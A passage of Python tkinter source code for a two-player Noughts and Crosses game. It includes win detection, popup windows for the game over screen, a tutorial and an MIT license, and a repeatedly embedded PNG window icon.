"(\x08\x1e\xbc(\x1e\nz\x12\xf4\xeaI\xf4$\x14<)(\x05\xa1\x1aK\x9bP\x93\x1aL\xd36iRw\xdb\xa6\x9bd7\xd9uwv\xba\xdf\xb3\xe3\x1b:\x08{\xd0\xce\xab\r\xf9\xc10\x03\xf3\x7f\x99\xff\xbc\xef\xf3\xfcy\x14K\xc0\x16\xe2\xb2\xef[\xc6\x96\x1b\x90:\x82+\xd7\x16\xf1W\xce\xe1k\xa8RL\x17h\xdcy\x08\xb7\xe6GuY$\xaf\x9c#\xd8{\x8c\xa5\x95\x12{\x07\xfb\xed\x15\xf7G\xca\x80\xa2(\xc4&>\xa0b\xaca\xea\x15\xf4\xe5y\x9a\xbaz\xb99\x17e|"\xca\xa9o~\xc2\xd7\xda\x87LYI\x1f\xc1\xd2R\x95B1\x8cQm\xc4\x1d\x19!\x9d5\xd8\xd1\x13f{\x97\x86U)\xd9*\xe7H\x1bx\xf4\x89\x13$S\xeb\xa8\xc54_\x7fw\x19\xb3\xa1\x13\xb59\xc2\xc1#\xfbX[\xf8\xd5V9G\xda\x80\xbev\x9bO\xbe\x18\xe3\xcdO\x7f\xa1?l\xd1\x1c\xeaB\xed\xe8\xc3\xdb="\xce\xf3\xae\xadr\x8e\xb4\x81\xd6`\x07\xef\xbfs\x92\x03\xbb\xc3\xa0\xaa`\xd6\xc8\xa7\xd7\xb9\x9b^\xc10\xb2\xb6\xca9\xd2\x06JF\x9ap\xa7\x9bW_8L\xef\xc0^L\xd5\'\x8a\xaeL!~\x89\xb2n\xd8*\xe7Hw\x81\xb9>N\xe2\xe6\x149C\xc7\xb4T4_\x08\x852\xe5\xc4\x02\x91\xe1\x93h;F\xa5\xba`C\xfc7\xd3\xd3\xd3\x1b+7\xf5\x9a\x9a\x9a\xb2\xbfv\x0f\xe9\x1d\xb0\ng\xc9\'\x17\x11\xbd\x88\xd2\xfe4Z("\xde\xb8Y\x18;\xcd\xee#\xef\xde\xd3H\xec\x80\xfc\x11,\x7f\xce\xc2\xd5KxM\x0f\xa9\xd8<\xfe\xf0 \xf1\xd8\x12\xe7\x7f\x9e\xe1\xe3o\'\x84&\xbc\xb9Atq\xfc\x1653B&\xafQmy\x84dr\x95\xb6\xf6\x06\x02-\xa2#j\x05[\xe5\x1ci\x03C\xcf\xbdA\xdb\xae!\x02\x9a\x97\xb9\x98N\xce\n\xe1\xed\xd8\xc3\xa1\xa3\xc3\xe4\xa23\xb6\xca9\xd2\x06<\x96\xce\x89WNqf\xd6b\xf0\xb1A\xba{\x87\xb1\x02\xbb\xf0l\x1f\xa6VN\xdb*\xe7H\x1bP5\x1fo\xbd|\x90\\b\x91\xf8\x9d;\xe43\tJ\xb9?\xc5}\x99L\xf2\x96\xadr\x8e\xb4\x01\xf2Y\x8e\xee\xdf\xc6\xf1\xc3=\xb4\xb7\xb8Q\xdd\x1e\xaa\xe5\x1cF\xf4\x02\xd5B\xde\x169G\xbe\r\xad?X\xbfv\x81D\xfc:\x96\xa2\xa1\xf9\xdb\xf0z\xdd\x88\xaf\x13\x19x\x06\xc5\xb7\xff\xbf\x07\xd1\xcc\xe5\xb9\x8d\x95\x9bz\xfdk\x10\xad\xde\xf8\x9ev\xbf\x88U\xbd\x8cg\xdb\x10\x9e\xe66\\.\x95\xcc\xe2EZ{\x9e\x15;\xd0x\xdf\xbf\xfb_A4;\xf6!>e\x9dj\xba\x88\x91\xbcM\x93\x08\x99D,\xce\xf9\xb1\xdfx\xef\xcb\x1f\xf0\x07\xf7=p\x03uE\x18\xbda\x90\xd7C\xe4j\xcdX\xc1>\xd6\x12+\x04\xda\xdd4\xb76b\x96\xe4\x0b\xcc\tu\x06\x06\x9e:.\x12\xaeDS%\xc5\xe93\x0b\xe4\xcc\x16\xdc-\xdd\x8c\x8c\n3\xd7\xe5\xa7\x1d\'\xd4\x19\xc8g\x92|\xf6\xd5Y^\xfc\xe8G\x86\x1fV\xe9\xec\xde\x89\x12\xec\xc7\xf3\xd0\xa8\x98|\xe5c\xd6\tu\x06|\x81\x00o\xbf\xf6\xbc\x98v"\xac\xa6\xc4xe\x8a\x014\x93\x12\x13O\x92\x9c\x08\x9b\xcd\xa0\xce@\xb9\x98\x13\xd3N\x03\xaf\xbft\x8c\xc7\x9f<@Ui\xda(S\x8a\x89\x19\x8aY\xddV=X\xea\x0c\xb8\\^jU\x03\xc5\x93\xa7R\xcd\x8b\xe7\x02V9+&\x1e\x8fh\xcb=\xfc>;o+\xff\x99\xc9\xc9I\xfb\xc9\x19RI\xb8\x19\xd4\xed\xc0V\xb0\xc5\x06\xe0/\t\x12\xef\xcd\xd8j\x93\xad\x00\x00\x00\x00IEND\xaeB`\x82')
pop.iconphoto(False,photo)
pop.geometry('300x150')
pop.title('GAME OVER!')
pop.configure(bg='#404040')
label=Label(master=pop,text=text,font=('Helvetica',20),bg='#404040',fg='white').pack(pady=5)
b01=Button(master=pop,text='Play Again!',font=('Helvetica',10),width=10,bg='#363636',fg='white',command=lambda m='yes':button(m)).pack(pady=10)
b02=Button(master=pop,text='Quit',font=('Helvetica',10),width=10,bg='#363636',fg='white',command=lambda m=None:button(m)).pack()
pop.protocol("WM_DELETE_WINDOW",popfunc)
pop.mainloop()
return rep
def XO(x):
global l,status,root,check,winnerpop
if x in status.keys():
return None
else:
globals()["b"]=globals()[x]
t=l[0]
l.reverse()
b.config(text=t,width=3,height=1,font=("Helvetica",42))
status[x]=t
for i in check:
test=[]
for j in i:
try:
test.append(status[j])
except:
pass
try:
if test[0]==test[1]==test[2]:
for k in i:
globals()["b"]=globals()[k]
b.config(fg="red")
reply=winnerpop(f"YAY {t} Won!🎉")
if reply=='yes':
status={}
l=["X","O"]
game()
else:
pass
except SystemExit:
raise SystemExit
except:
pass
if len(status)==9:
reply=winnerpop("Tie!")
if reply=='yes':
status={}
l=["X","O"]
game()
else:
raise SystemExit
def game():
global root
global b1,b2,b3,b4,b5,b6,b7,b8,b9
root=Tk()
photo=PhotoImage(data=b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x06\x00\x00\x00szz\xf4\x00\x00\x00\x01sRGB\x00\xae\xce\x1c\xe9\x00\x00\x00\x04gAMA\x00\x00\xb1\x8f\x0b\xfca\x05\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x03\x95IDATXG\xc5\x96Mh\x1ce\x18\xc7\x7f\xb3\xb3\xbb\xc9dw\xf3\xb5\xd9&-\xbb\xa9E\xd3\xc6|\xb4\x92\xd4\xaa\x8d6\xfd\x10\x0f\x96\x9e\xea\x07\xa8 "(\x08\x1e\xbc(\x1e\nz\x12\xf4\xeaI\xf4$\x14<)(\x05\xa1\x1aK\x9bP\x93\x1aL\xd36iRw\xdb\xa6\x9bd7\xd9uwv\xba\xdf\xb3\xe3\x1b:\x08{\xd0\xce\xab\r\xf9\xc10\x03\xf3\x7f\x99\xff\xbc\xef\xf3\xfcy\x14K\xc0\x16\xe2\xb2\xef[\xc6\x96\x1b\x90:\x82+\xd7\x16\xf1W\xce\xe1k\xa8RL\x17h\xdcy\x08\xb7\xe6GuY$\xaf\x9c#\xd8{\x8c\xa5\x95\x12{\x07\xfb\xed\x15\xf7G\xca\x80\xa2(\xc4&>\xa0b\xaca\xea\x15\xf4\xe5y\x9a\xbaz\xb99\x17e|"\xca\xa9o~\xc2\xd7\xda\x87LYI\x1f\xc1\xd2R\x95B1\x8cQm\xc4\x1d\x19!\x9d5\xd8\xd1\x13f{\x97\x86U)\xd9*\xe7H\x1bx\xf4\x89\x13$S\xeb\xa8\xc54_\x7fw\x19\xb3\xa1\x13\xb59\xc2\xc1#\xfbX[\xf8\xd5V9G\xda\x80\xbev\x9bO\xbe\x18\xe3\xcdO\x7f\xa1?l\xd1\x1c\xeaB\xed\xe8\xc3\xdb="\xce\xf3\xae\xadr\x8e\xb4\x81\xd6`\x07\xef\xbfs\x92\x03\xbb\xc3\xa0\xaa`\xd6\xc8\xa7\xd7\xb9\x9b^\xc10\xb2\xb6\xca9\xd2\x06JF\x9ap\xa7\x9bW_8L\xef\xc0^L\xd5\'\x8a\xaeL!~\x89\xb2n\xd8*\xe7Hw\x81\xb9>N\xe2\xe6\x149C\xc7\xb4T4_\x08\x852\xe5\xc4\x02\x91\xe1\x93h;F\xa5\xba`C\xfc7\xd3\xd3\xd3\x1b+7\xf5\x9a\x9a\x9a\xb2\xbfv\x0f\xe9\x1d\xb0\ng\xc9\'\x17\x11\xbd\x88\xd2\xfe4Z("\xde\xb8Y\x18;\xcd\xee#\xef\xde\xd3H\xec\x80\xfc\x11,\x7f\xce\xc2\xd5KxM\x0f\xa9\xd8<\xfe\xf0 \xf1\xd8\x12\xe7\x7f\x9e\xe1\xe3o\'\x84&\xbc\xb9Atq\xfc\x1653B&\xafQmy\x84dr\x95\xb6\xf6\x06\x02-\xa2#j\x05[\xe5\x1ci\x03C\xcf\xbdA\xdb\xae!\x02\x9a\x97\xb9\x98N\xce\n\xe1\xed\xd8\xc3\xa1\xa3\xc3\xe4\xa23\xb6\xca9\xd2\x06<\x96\xce\x89WNqf\xd6b\xf0\xb1A\xba{\x87\xb1\x02\xbb\xf0l\x1f\xa6VN\xdb*\xe7H\x1bP5\x1fo\xbd|\x90\\b\x91\xf8\x9d;\xe43\tJ\xb9?\xc5}\x99L\xf2\x96\xadr\x8e\xb4\x01\xf2Y\x8e\xee\xdf\xc6\xf1\xc3=\xb4\xb7\xb8Q\xdd\x1e\xaa\xe5\x1cF\xf4\x02\xd5B\xde\x169G\xbe\r\xad?X\xbfv\x81D\xfc:\x96\xa2\xa1\xf9\xdb\xf0z\xdd\x88\xaf\x13\x19x\x06\xc5\xb7\xff\xbf\x07\xd1\xcc\xe5\xb9\x8d\x95\x9bz\xfdk\x10\xad\xde\xf8\x9ev\xbf\x88U\xbd\x8cg\xdb\x10\x9e\xe66\\.\x95\xcc\xe2EZ{\x9e\x15;\xd0x\xdf\xbf\xfb_A4;\xf6!>e\x9dj\xba\x88\x91\xbcM\x93\x08\x99D,\xce\xf9\xb1\xdfx\xef\xcb\x1f\xf0\x07\xf7=p\x03uE\x18\xbda\x90\xd7C\xe4j\xcdX\xc1>\xd6\x12+\x04\xda\xdd4\xb76b\x96\xe4\x0b\xcc\tu\x06\x06\x9e:.\x12\xaeDS%\xc5\xe93\x0b\xe4\xcc\x16\xdc-\xdd\x8c\x8c\n3\xd7\xe5\xa7\x1d\'\xd4\x19\xc8g\x92|\xf6\xd5Y^\xfc\xe8G\x86\x1fV\xe9\xec\xde\x89\x12\xec\xc7\xf3\xd0\xa8\x98|\xe5c\xd6\tu\x06|\x81\x00o\xbf\xf6\xbc\x98v"\xac\xa6\xc4xe\x8a\x014\x93\x12\x13O\x92\x9c\x08\x9b\xcd\xa0\xce@\xb9\x98\x13\xd3N\x03\xaf\xbft\x8c\xc7\x9f<@Ui\xda(S\x8a\x89\x19\x8aY\xddV=X\xea\x0c\xb8\\^jU\x03\xc5\x93\xa7R\xcd\x8b\xe7\x02V9+&\x1e\x8fh\xcb=\xfc>;o+\xff\x99\xc9\xc9I\xfb\xc9\x19RI\xb8\x19\xd4\xed\xc0V\xb0\xc5\x06\xe0/\t\x12\xef\xcd\xd8j\x93\xad\x00\x00\x00\x00IEND\xaeB`\x82')
root.iconphoto(False,photo)
root.title("Noughts and Crosses")
root.geometry('324x347')
root.configure(bg='#363636')
b1=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b1':XO(m))
b1.grid(row=1,column=1)
b2=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b2':XO(m))
b2.grid(row=1,column=2)
b3=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b3':XO(m))
b3.grid(row=1,column=3)
b4=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b4':XO(m))
b4.grid(row=2,column=1)
b5=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b5':XO(m))
b5.grid(row=2,column=2)
b6=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b6':XO(m))
b6.grid(row=2,column=3)
b7=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b7':XO(m))
b7.grid(row=3,column=1)
b8=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b8':XO(m))
b8.grid(row=3,column=2)
b9=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b9':XO(m))
b9.grid(row=3,column=3)
root.mainloop()
def start():
menu.destroy()
game()
def tutorial():
tut=Toplevel()
tut.grab_set()
tut.title("Tutorial")
photo=PhotoImage(data=b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x06\x00\x00\x00szz\xf4\x00\x00\x00\x01sRGB\x00\xae\xce\x1c\xe9\x00\x00\x00\x04gAMA\x00\x00\xb1\x8f\x0b\xfca\x05\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x03\x95IDATXG\xc5\x96Mh\x1ce\x18\xc7\x7f\xb3\xb3\xbb\xc9dw\xf3\xb5\xd9&-\xbb\xa9E\xd3\xc6|\xb4\x92\xd4\xaa\x8d6\xfd\x10\x0f\x96\x9e\xea\x07\xa8 "(\x08\x1e\xbc(\x1e\nz\x12\xf4\xeaI\xf4$\x14<)(\x05\xa1\x1aK\x9bP\x93\x1aL\xd36iRw\xdb\xa6\x9bd7\xd9uwv\xba\xdf\xb3\xe3\x1b:\x08{\xd0\xce\xab\r\xf9\xc10\x03\xf3\x7f\x99\xff\xbc\xef\xf3\xfcy\x14K\xc0\x16\xe2\xb2\xef[\xc6\x96\x1b\x90:\x82+\xd7\x16\xf1W\xce\xe1k\xa8RL\x17h\xdcy\x08\xb7\xe6GuY$\xaf\x9c#\xd8{\x8c\xa5\x95\x12{\x07\xfb\xed\x15\xf7G\xca\x80\xa2(\xc4&>\xa0b\xaca\xea\x15\xf4\xe5y\x9a\xbaz\xb99\x17e|"\xca\xa9o~\xc2\xd7\xda\x87LYI\x1f\xc1\xd2R\x95B1\x8cQm\xc4\x1d\x19!\x9d5\xd8\xd1\x13f{\x97\x86U)\xd9*\xe7H\x1bx\xf4\x89\x13$S\xeb\xa8\xc54_\x7fw\x19\xb3\xa1\x13\xb59\xc2\xc1#\xfbX[\xf8\xd5V9G\xda\x80\xbev\x9bO\xbe\x18\xe3\xcdO\x7f\xa1?l\xd1\x1c\xeaB\xed\xe8\xc3\xdb="\xce\xf3\xae\xadr\x8e\xb4\x81\xd6`\x07\xef\xbfs\x92\x03\xbb\xc3\xa0\xaa`\xd6\xc8\xa7\xd7\xb9\x9b^\xc10\xb2\xb6\xca9\xd2\x06JF\x9ap\xa7\x9bW_8L\xef\xc0^L\xd5\'\x8a\xaeL!~\x89\xb2n\xd8*\xe7Hw\x81\xb9>N\xe2\xe6\x149C\xc7\xb4T4_\x08\x852\xe5\xc4\x02\x91\xe1\x93h;F\xa5\xba`C\xfc7\xd3\xd3\xd3\x1b+7\xf5\x9a\x9a\x9a\xb2\xbfv\x0f\xe9\x1d\xb0\ng\xc9\'\x17\x11\xbd\x88\xd2\xfe4Z("\xde\xb8Y\x18;\xcd\xee#\xef\xde\xd3H\xec\x80\xfc\x11,\x7f\xce\xc2\xd5KxM\x0f\xa9\xd8<\xfe\xf0 \xf1\xd8\x12\xe7\x7f\x9e\xe1\xe3o\'\x84&\xbc\xb9Atq\xfc\x1653B&\xafQmy\x84dr\x95\xb6\xf6\x06\x02-\xa2#j\x05[\xe5\x1ci\x03C\xcf\xbdA\xdb\xae!\x02\x9a\x97\xb9\x98N\xce\n\xe1\xed\xd8\xc3\xa1\xa3\xc3\xe4\xa23\xb6\xca9\xd2\x06<\x96\xce\x89WNqf\xd6b\xf0\xb1A\xba{\x87\xb1\x02\xbb\xf0l\x1f\xa6VN\xdb*\xe7H\x1bP5\x1fo\xbd|\x90\\b\x91\xf8\x9d;\xe43\tJ\xb9?\xc5}\x99L\xf2\x96\xadr\x8e\xb4\x01\xf2Y\x8e\xee\xdf\xc6\xf1\xc3=\xb4\xb7\xb8Q\xdd\x1e\xaa\xe5\x1cF\xf4\x02\xd5B\xde\x169G\xbe\r\xad?X\xbfv\x81D\xfc:\x96\xa2\xa1\xf9\xdb\xf0z\xdd\x88\xaf\x13\x19x\x06\xc5\xb7\xff\xbf\x07\xd1\xcc\xe5\xb9\x8d\x95\x9bz\xfdk\x10\xad\xde\xf8\x9ev\xbf\x88U\xbd\x8cg\xdb\x10\x9e\xe66\\.\x95\xcc\xe2EZ{\x9e\x15;\xd0x\xdf\xbf\xfb_A4;\xf6!>e\x9dj\xba\x88\x91\xbcM\x93\x08\x99D,\xce\xf9\xb1\xdfx\xef\xcb\x1f\xf0\x07\xf7=p\x03uE\x18\xbda\x90\xd7C\xe4j\xcdX\xc1>\xd6\x12+\x04\xda\xdd4\xb76b\x96\xe4\x0b\xcc\tu\x06\x06\x9e:.\x12\xaeDS%\xc5\xe93\x0b\xe4\xcc\x16\xdc-\xdd\x8c\x8c\n3\xd7\xe5\xa7\x1d\'\xd4\x19\xc8g\x92|\xf6\xd5Y^\xfc\xe8G\x86\x1fV\xe9\xec\xde\x89\x12\xec\xc7\xf3\xd0\xa8\x98|\xe5c\xd6\tu\x06|\x81\x00o\xbf\xf6\xbc\x98v"\xac\xa6\xc4xe\x8a\x014\x93\x12\x13O\x92\x9c\x08\x9b\xcd\xa0\xce@\xb9\x98\x13\xd3N\x03\xaf\xbft\x8c\xc7\x9f<@Ui\xda(S\x8a\x89\x19\x8aY\xddV=X\xea\x0c\xb8\\^jU\x03\xc5\x93\xa7R\xcd\x8b\xe7\x02V9+&\x1e\x8fh\xcb=\xfc>;o+\xff\x99\xc9\xc9I\xfb\xc9\x19RI\xb8\x19\xd4\xed\xc0V\xb0\xc5\x06\xe0/\t\x12\xef\xcd\xd8j\x93\xad\x00\x00\x00\x00IEND\xaeB`\x82')
tut.iconphoto(False,photo)
tut.configure(bg='#404040')
text='''Noughts and crosses is a paper-and-pencil game for two players who take turns marking the spaces in a three-by-three grid with X or O. The player who succeeds in placing three of their marks in a horizontal, vertical, or diagonal row is the winner.
To play the game, the first player clicks on the desired box to place an 'X'. Then the next player places an 'O'.'''
label=Label(master=tut,text=text,font=('Calibri',15),wraplength=500,bg='#404040',fg='white').pack()
b01=Button(master=tut,text='Close',font=('Helvetica',10),width=10,bg='#363636',fg='white',command=tut.destroy).pack(pady=5)
tut.mainloop()
def license():
ls=Toplevel()
ls.grab_set()
ls.title("License")
photo=PhotoImage(data=b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x06\x00\x00\x00szz\xf4\x00\x00\x00\x01sRGB\x00\xae\xce\x1c\xe9\x00\x00\x00\x04gAMA\x00\x00\xb1\x8f\x0b\xfca\x05\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x03\x95IDATXG\xc5\x96Mh\x1ce\x18\xc7\x7f\xb3\xb3\xbb\xc9dw\xf3\xb5\xd9&-\xbb\xa9E\xd3\xc6|\xb4\x92\xd4\xaa\x8d6\xfd\x10\x0f\x96\x9e\xea\x07\xa8 "(\x08\x1e\xbc(\x1e\nz\x12\xf4\xeaI\xf4$\x14<)(\x05\xa1\x1aK\x9bP\x93\x1aL\xd36iRw\xdb\xa6\x9bd7\xd9uwv\xba\xdf\xb3\xe3\x1b:\x08{\xd0\xce\xab\r\xf9\xc10\x03\xf3\x7f\x99\xff\xbc\xef\xf3\xfcy\x14K\xc0\x16\xe2\xb2\xef[\xc6\x96\x1b\x90:\x82+\xd7\x16\xf1W\xce\xe1k\xa8RL\x17h\xdcy\x08\xb7\xe6GuY$\xaf\x9c#\xd8{\x8c\xa5\x95\x12{\x07\xfb\xed\x15\xf7G\xca\x80\xa2(\xc4&>\xa0b\xaca\xea\x15\xf4\xe5y\x9a\xbaz\xb99\x17e|"\xca\xa9o~\xc2\xd7\xda\x87LYI\x1f\xc1\xd2R\x95B1\x8cQm\xc4\x1d\x19!\x9d5\xd8\xd1\x13f{\x97\x86U)\xd9*\xe7H\x1bx\xf4\x89\x13$S\xeb\xa8\xc54_\x7fw\x19\xb3\xa1\x13\xb59\xc2\xc1#\xfbX[\xf8\xd5V9G\xda\x80\xbev\x9bO\xbe\x18\xe3\xcdO\x7f\xa1?l\xd1\x1c\xeaB\xed\xe8\xc3\xdb="\xce\xf3\xae\xadr\x8e\xb4\x81\xd6`\x07\xef\xbfs\x92\x03\xbb\xc3\xa0\xaa`\xd6\xc8\xa7\xd7\xb9\x9b^\xc10\xb2\xb6\xca9\xd2\x06JF\x9ap\xa7\x9bW_8L\xef\xc0^L\xd5\'\x8a\xaeL!~\x89\xb2n\xd8*\xe7Hw\x81\xb9>N\xe2\xe6\x149C\xc7\xb4T4_\x08\x852\xe5\xc4\x02\x91\xe1\x93h;F\xa5\xba`C\xfc7\xd3\xd3\xd3\x1b+7\xf5\x9a\x9a\x9a\xb2\xbfv\x0f\xe9\x1d\xb0\ng\xc9\'\x17\x11\xbd\x88\xd2\xfe4Z("\xde\xb8Y\x18;\xcd\xee#\xef\xde\xd3H\xec\x80\xfc\x11,\x7f\xce\xc2\xd5KxM\x0f\xa9\xd8<\xfe\xf0 \xf1\xd8\x12\xe7\x7f\x9e\xe1\xe3o\'\x84&\xbc\xb9Atq\xfc\x1653B&\xafQmy\x84dr\x95\xb6\xf6\x06\x02-\xa2#j\x05[\xe5\x1ci\x03C\xcf\xbdA\xdb\xae!\x02\x9a\x97\xb9\x98N\xce\n\xe1\xed\xd8\xc3\xa1\xa3\xc3\xe4\xa23\xb6\xca9\xd2\x06<\x96\xce\x89WNqf\xd6b\xf0\xb1A\xba{\x87\xb1\x02\xbb\xf0l\x1f\xa6VN\xdb*\xe7H\x1bP5\x1fo\xbd|\x90\\b\x91\xf8\x9d;\xe43\tJ\xb9?\xc5}\x99L\xf2\x96\xadr\x8e\xb4\x01\xf2Y\x8e\xee\xdf\xc6\xf1\xc3=\xb4\xb7\xb8Q\xdd\x1e\xaa\xe5\x1cF\xf4\x02\xd5B\xde\x169G\xbe\r\xad?X\xbfv\x81D\xfc:\x96\xa2\xa1\xf9\xdb\xf0z\xdd\x88\xaf\x13\x19x\x06\xc5\xb7\xff\xbf\x07\xd1\xcc\xe5\xb9\x8d\x95\x9bz\xfdk\x10\xad\xde\xf8\x9ev\xbf\x88U\xbd\x8cg\xdb\x10\x9e\xe66\\.\x95\xcc\xe2EZ{\x9e\x15;\xd0x\xdf\xbf\xfb_A4;\xf6!>e\x9dj\xba\x88\x91\xbcM\x93\x08\x99D,\xce\xf9\xb1\xdfx\xef\xcb\x1f\xf0\x07\xf7=p\x03uE\x18\xbda\x90\xd7C\xe4j\xcdX\xc1>\xd6\x12+\x04\xda\xdd4\xb76b\x96\xe4\x0b\xcc\tu\x06\x06\x9e:.\x12\xaeDS%\xc5\xe93\x0b\xe4\xcc\x16\xdc-\xdd\x8c\x8c\n3\xd7\xe5\xa7\x1d\'\xd4\x19\xc8g\x92|\xf6\xd5Y^\xfc\xe8G\x86\x1fV\xe9\xec\xde\x89\x12\xec\xc7\xf3\xd0\xa8\x98|\xe5c\xd6\tu\x06|\x81\x00o\xbf\xf6\xbc\x98v"\xac\xa6\xc4xe\x8a\x014\x93\x12\x13O\x92\x9c\x08\x9b\xcd\xa0\xce@\xb9\x98\x13\xd3N\x03\xaf\xbft\x8c\xc7\x9f<@Ui\xda(S\x8a\x89\x19\x8aY\xddV=X\xea\x0c\xb8\\^jU\x03\xc5\x93\xa7R\xcd\x8b\xe7\x02V9+&\x1e\x8fh\xcb=\xfc>;o+\xff\x99\xc9\xc9I\xfb\xc9\x19RI\xb8\x19\xd4\xed\xc0V\xb0\xc5\x06\xe0/\t\x12\xef\xcd\xd8j\x93\xad\x00\x00\x00\x00IEND\xaeB`\x82')
ls.iconphoto(False,photo)
ls.configure(bg='#404040')
text='''Copyright 2021 Aniket Maity
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.'''
label=Label(master=ls,text=text,font=('Calibri',15),wraplength=500,bg='#404040',fg='white').pack()
b01=Button(master=ls,text='Close',font=('Helvetica',10),width=10,bg='#363636',fg='white',command=ls.destroy).pack(pady=5)
ls.mainloop()
def more():
open("https://colab.research.google.com/drive/1dkFScEkzyDjLS4OvYtJxvvC8AMGDzlTK#scrollTo=SoriZIQIm1FR")
def menuscreen():
global menu
menu=Tk()
photo=PhotoImage(data=b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x06\x00\x00\x00szz\xf4\x00\x00\x00\x01sRGB\x00\xae\xce\x1c\xe9\x00\x00\x00\x04gAMA\x00\x00\xb1\x8f\x0b\xfca\x05\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x03\x95IDATXG\xc5\x96Mh\x1ce\x18\xc7\x7f\xb3\xb3\xbb\xc9dw\xf3\xb5\xd9&-\xbb\xa9E\xd3\xc6|\xb4\x92\xd4\xaa\x8d6\xfd\x10\x0f\x96\x9e\xea\x07\xa8 "(\x08\x1e\xbc(\x1e\nz\x12\xf4\xeaI\xf4$\x14<)(\x05\xa1\x1aK\x9bP\x93\x1aL\xd36iRw\xdb\xa6\x9bd7\xd9uwv\xba\xdf\xb3\xe3\x1b:\x08{\xd0\xce\xab\r\xf9\xc10\x03\xf3\x7f\x99\xff\xbc\xef\xf3\xfcy\x14K\xc0\x16\xe2\xb2\xef[\xc6\x96\x1b\x90:\x82+\xd7\x16\xf1W\xce\xe1k\xa8RL\x17h\xdcy\x08\xb7\xe6GuY$\xaf\x9c#\xd8{\x8c\xa5\x95\x12{\x07\xfb\xed\x15\xf7G\xca\x80\xa2(\xc4&>\xa0b\xaca\xea\x15\xf4\xe5y\x9a\xbaz\xb99\x17e|"\xca\xa9o~\xc2\xd7\xda\x87LYI\x1f\xc1\xd2R\x95B1\x8cQm\xc4\x1d\x19!\x9d5\xd8\xd1\x13f{\x97\x86U)\xd9*\xe7H\x1bx\xf4\x89\x13$S\xeb\xa8\xc54_\x7fw\x19\xb3\xa1\x13\xb59\xc2\xc1#\xfbX[\xf8\xd5V9G\xda\x80\xbev\x9bO\xbe\x18\xe3\xcdO\x7f\xa1?l\xd1\x1c\xeaB\xed\xe8\xc3\xdb="\xce\xf3\xae\xadr\x8e\xb4\x81\xd6`\x07\xef\xbfs\x92\x03\xbb\xc3\xa0\xaa`\xd6\xc8\xa7\xd7\xb9\x9b^\xc10\xb2\xb6\xca9\xd2\x06JF\x9ap\xa7\x9bW_8L\xef\xc0^L\xd5\'\x8a\xaeL!~\x89\xb2n\xd8*\xe7Hw\x81\xb9>N\xe2\xe6\x149C\xc7\xb4T4_\x08\x852\xe5\xc4\x02\x91\xe1\x93h;F\xa5\xba`C\xfc7\xd3\xd3\xd3\x1b+7\xf5\x9a\x9a\x9a\xb2\xbfv\x0f\xe9\x1d\xb0\ng\xc9\'\x17\x11\xbd\x88\xd2\xfe4Z("\xde\xb8Y\x18;\xcd\xee#\xef\xde\xd3H\xec\x80\xfc\x11,\x7f\xce\xc2\xd5KxM\x0f\xa9\xd8<\xfe\xf0 \xf1\xd8\x12\xe7\x7f\x9e\xe1\xe3o\'\x84&\xbc\xb9Atq\xfc\x1653B&\xafQmy\x84dr\x95\xb6\xf6\x06\x02-\xa2#j\x05[\xe5\x1ci\x03C\xcf\xbdA\xdb\xae!\x02\x9a\x97\xb9\x98N\xce\n\xe1\xed\xd8\xc3\xa1\xa3\xc3\xe4\xa23\xb6\xca9\xd2\x06<\x96\xce\x89WNqf\xd6b\xf0\xb1A\xba{\x87\xb1\x02\xbb\xf0l\x1f\xa6VN\xdb*\xe7H\x1bP5\x1fo\xbd|\x90\\b\x91\xf8\x9d;\xe43\tJ\xb9?\xc5}\x99L\xf2\x96\xadr\x8e\xb4\x01\xf2Y\x8e\xee\xdf\xc6\xf1\xc3=\xb4\xb7\xb8Q\xdd\x1e\xaa\xe5\x1cF\xf4\x02\xd5B\xde\x169G\xbe\r\xad?X\xbfv\x81D\xfc:\x96\xa2\xa1\xf9\xdb\xf0z\xdd\x88\xaf\x13\x19x\x06\xc5\xb7\xff\xbf\x07\xd1\xcc\xe5\xb9\x8d\x95\x9bz\xfdk\x10\xad\xde\xf8\x9ev\xbf\x88U\xbd\x8cg\xdb\x10\x9e\xe66\\.\x95\xcc\